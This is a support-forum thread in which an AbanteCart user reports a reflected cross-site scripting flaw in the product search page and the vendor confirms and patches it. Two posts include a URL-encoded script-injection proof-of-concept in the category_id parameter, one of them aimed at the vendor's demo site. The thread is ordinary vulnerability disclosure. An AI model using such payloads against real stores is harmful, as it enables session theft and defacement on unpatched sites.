Project Home
Manuals
Contact Us
Download
Demo
Welcome,
Guest
. Please
login
or
register
.
Did you miss your
activation email
?
1 Hour
1 Day
1 Week
1 Month
Forever
Login with username, password and session length
News:
AbanteCart v
1.4.0
is released.
Home
Help
Search
Calendar
Login
Register
AbanteCart Community
»
Shopping Cart Operations
»
Security
»
XSS Vulnerability
« previous
next »
Print
Pages: [
1
]
Author
Topic: XSS Vulnerability (Read 14997 times)
Mahomed Dawood
Jr. Member
Posts: 61
Karma: +4/-0
XSS Vulnerability
«
on:
December 09, 2021, 05:15:44 AM »
Hi Guys
I recently ran a security check on my website and came across some reflective xss vulnerability on the product page
Is this something that abantecart are planning on fixing ? or could this just be misconfiguration on my side ?
Logged
Basara
Administrator
Hero Member
Posts: 5993
Karma: +284/-2
Re: XSS Vulnerability
«
Reply #1 on:
December 09, 2021, 05:35:06 AM »
Hello.
Can you please tell us more about your findings?
Logged
Please
rate your AbanteCart experience
or
leave your review
Mahomed Dawood
Jr. Member
Posts: 61
Karma: +4/-0
Re: XSS Vulnerability
«
Reply #2 on:
December 09, 2021, 05:58:38 AM »
Hi
So if i call my website
http://mywebsite/uri?keyword=10mm&category_id=%2522%253e%253cscript%253ealert%2528987654321%2529%253c%252fscript%253e
A pop up appears with a javascript
Please see attached
Logged
Basara
Administrator
Hero Member
Posts: 5993
Karma: +284/-2
Re: XSS Vulnerability
«
Reply #3 on:
December 09, 2021, 07:18:33 AM »
Hello.
What is your AbanteCart version?
I do not see the problem on AbanteCart demo
https://demo.abantecart.com/uri?keyword=10mm&category_id=%2522%253e%253cscript%253ealert%2528987654321%2529%253c%252fscript%253e
Logged
Please
rate your AbanteCart experience
or
leave your review
Mahomed Dawood
Jr. Member
Posts: 61
Karma: +4/-0
Re: XSS Vulnerability
«
Reply #4 on:
December 09, 2021, 08:37:46 AM »
Hi
Seems to originate from the search bar
Try this
https://demo.abantecart.com/index.php?rt=product/search&keyword=shoe&category_id=%2522%253e%253cscript%253ealert%2528987654321%2529%253c%252fscript%253e
Logged
Mahomed Dawood
Jr. Member
Posts: 61
Karma: +4/-0
Re: XSS Vulnerability
«
Reply #5 on:
December 09, 2021, 08:48:25 AM »
I have abantecart v1.3.1
Logged
Basara
Administrator
Hero Member
Posts: 5993
Karma: +284/-2
Re: XSS Vulnerability
«
Reply #6 on:
December 10, 2021, 12:07:23 AM »
Hello.
Thank you for reporting. We will provide the fix shortly
Please follow issue in the bug tracker
https://github.com/abantecart/abantecart-src/issues/1513
«
Last Edit: December 10, 2021, 06:25:50 AM by Basara
»
Logged
Please
rate your AbanteCart experience
or
leave your review
Mahomed Dawood
Jr. Member
Posts: 61
Karma: +4/-0
Re: XSS Vulnerability
«
Reply #7 on:
December 10, 2021, 12:17:47 AM »
Thank you
Logged
Basara
Administrator
Hero Member
Posts: 5993
Karma: +284/-2
Re: XSS Vulnerability
«
Reply #8 on:
December 14, 2021, 06:28:24 AM »
Hello.
You can try to apply the fix on your site
See commit in
https://github.com/abantecart/abantecart-src/issues/1513
Logged
Please
rate your AbanteCart experience
or
leave your review
Mahomed Dawood
Jr. Member
Posts: 61
Karma: +4/-0
Re: XSS Vulnerability
«
Reply #9 on:
December 15, 2021, 04:28:59 AM »
Hi
Works like a charm
Thank you for your assistance
Logged
garyfartsalot
Newbie
Posts: 23
Karma: +1/-0
Re: XSS Vulnerability
«
Reply #10 on:
January 13, 2023, 05:10:46 AM »
Hi Mahomed Dawood
How did you fix?
Did you update abantecart to latest fixed version or did you apply a fix?
Logged
llegrand
Hero Member
Posts: 1811
Karma: +526/-7
Re: XSS Vulnerability
«
Reply #11 on:
January 13, 2023, 06:05:14 PM »
what cart version are you currently using?
We have posted the patch file for AbanteCart v 1.3.2 along with instructions
You can get it here:
https://why2central.net/patch/abantecart-v1-3-2-default-core-xss-vulnerability-patch-file/
If you are using v 1.3.3, the corrected files are already in that code.
Logged
Print
Pages: [
1
]
« previous
next »
AbanteCart Community
»
Shopping Cart Operations
»
Security
»
XSS Vulnerability
Powered by SMFPacks Social Login Mod